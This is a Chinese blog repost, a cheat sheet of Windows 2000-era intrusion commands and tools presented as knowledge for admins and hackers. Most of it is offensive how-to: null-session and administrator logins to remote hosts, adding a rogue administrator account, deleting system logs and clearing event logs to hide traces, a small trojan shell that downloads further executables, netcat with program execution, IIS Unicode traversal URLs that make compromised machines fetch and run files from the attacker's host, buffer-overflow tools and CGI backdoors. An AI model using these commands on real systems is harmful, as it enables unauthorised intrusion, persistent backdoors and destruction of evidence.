网管和黑客都必须知道的命令!看了不要做坏事!

简介:
(与远程主机建立空管连接) net use IP地址ipc$ "" /use:"" 

(以管理员身份登录远程主机) net use IP地址ipc$ "密码" /use:"Administrator" 

(传送文件到远程主机WINNT目录下)copy 本机目录路径程序 IP地址admin$ 

(查看远程主机时间) net time IP地址 

(定时启动某个程序) at IP地址 02:18 readme.exe 

(查看共享) net view IP地址 

(查看netbios工作组列表) nbtstat -A IP地址 

(将远程主机C盘映射为自己的F盘) net use f: IP地址c$ ""/user:"Administrator" 

(这两条把自己增加到管理员组): net user 用户名 密码 /add 

net localgroup Administrators 用户名 /add 

(断开连接) net use IP地址ipc$ /delete 

===================================================== 

擦屁屁: 

del C:winntsystem32logfiles*.* 

del C:winntsystem32config*.evt 

del C:winntsystem32dtclog*.* 

del C:winntsystem32*.log 

del C:winntsystem32*.txt 

del C:winnt*.txt 

del C:winnt*.log 

============================ 

一、netsvc.exe 

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 

netsvc /list IP地址 

netsvc schedule IP地址 /query 

netsvc IP地址 schedule /start 

二、OpenTelnet.exe 

远程启动主机的Telnet服务,并绑定端口到7878,例如: 

OpenTelnet IP地址 用户名 密码 1 7878 

然后就可以telnet到主机的7878端口,进入DOS方式下: 

telnet IP地址 7878 

三、winshell.exe 

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 

p Path (查看winshell主程序的路径信息) 

b reBoot (重新启动机器) 

d shutDown (关闭机器) 

s Shell (执行后你就会看到可爱的“C:>”) 

x eXit (退出本次登录会话,此命令并不终止winshell的运行) 

CMD> 
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 

四、3389登陆器,GUI方式登录远程主机的 

五、elsave.exe 

事件日志清除工具 

elsave -s IP地址 -l "application" -C 

elsave -s IP地址 -l "system" -C 

elsave -s IP地址 -l "security" -C 

执行后成功清除应用程序日志,系统日志,安全日志 

六、hbulot.exe 

开启win2kserver和winxp的3389服务 

hbulot [/r] 

使用/r表示安装完成后自动重起目标使设置生效。 

七、nc.exe(netcat.exe) 

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 

想要连接到某处: nc [-options] hostname port[s] [ports] ... 

绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 

参数: 

-e prog 程序重定向,一旦连接,就执行 [危险!!] 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, ... 

-h 帮助信息 

-i secs 延时的间隔 

-l 监听模式,用于入站连接 

-n 指定数字的IP地址,不能用hostname 

-o file 记录16进制的传输 

-p port 本地端口号 

-r 任意指定本地及远程端口 

-s addr 本地源地址 

-u UDP模式 

-v 详细输出——用两个-v可得到更详细的内容 

-w secs timeout的时间 

-z 将输入输出关掉——用于扫描时 

八、TFTPD32.EXE 

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: 
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 

然后可以直接令文件运行: 
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 

九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 

一、一 Xscan命令行运行参数说明: 

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 

1.命令格式: xscan -host [-] [其他选项] 

xscan -file [其他选项] 

其中 含义如下: 

-port : 检测常用服务的端口状态(可通过datconfig.ini文件的"PORT-SCAN-OPTIONSPORT-LIST"项定制待检测端口列表); 

-ftp : 检测FTP弱口令(可通过datconfig.ini文件设置用户名/密码字典文件); 

-ntpass : 检测NT-Server弱口令(可通过datconfig.ini文件设置用户名/密码字典文件); 

-cgi : 检测CGI漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案); 

-iis : 检测IIS漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案); 

[其他选项] 含义如下: 

-v: 显示详细扫描进度 

-p: 跳过Ping不通的主机 

-o: 跳过没有检测到开放端口的主机 

-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10 



本文转自 wwwzbx 51CTO博客,原文链接:http://blog.51cto.com/wwwzbx/3241,如需转载请自行联系原作者

相关文章
|
安全 网络协议 网络安全
浅谈内网渗透
内网穿透即NAT穿透,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。拿.....
|
安全 搜索推荐 PHP
记某网络安全设备逻辑缺陷导致的getshell
记某网络安全设备逻辑缺陷导致的getshell
98 0
|
安全
网站被主机攻击断网 871
网络攻击871是怎么回事?
2809 0
|
数据安全/隐私保护 Python
|
安全 测试技术 数据安全/隐私保护
|
网络协议 Windows 网络安全